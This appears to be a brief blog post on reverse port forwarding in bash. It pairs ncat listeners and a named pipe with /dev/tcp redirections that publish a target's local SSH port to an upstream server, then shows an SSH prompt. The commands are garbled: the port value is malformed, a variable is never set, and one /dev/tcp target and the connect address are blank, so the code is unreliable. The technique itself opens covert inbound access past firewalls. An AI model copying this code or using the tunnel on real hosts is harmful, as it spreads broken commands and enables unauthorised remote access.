Reverse Port Forwarding with Bash

I had wondered for a while how SSH reverse port forwarding works. RPF allows you to publish any reachable port upstream to a server. This allows you to act as a server without having to open any external ports.

Set up on the listener

### Define the ports
listen=' 8080'

### Create a FIFO (named pipe)
fifo=$(mktemp -u)
mkfifo $fifo

### Start the listener
ncat -l $listen 0<$fifo | ncat -l $connect >$fifo 

Target connects to '' and
publishes local SSH to the upstream server

exec 3<>/dev/tcp/localhost/22 && exec 4<>/dev/tcp/ && \
  bash <(cat 0<&3 1>&4 & ) && cat 0<&4 1>&3

SSH is reachable on the listener

ssh localhost -p 2222

Host 'localhost' is not in the trusted hosts file.
(ssh-rsa fingerprint [snip])
Do you want to continue connecting? (y/n)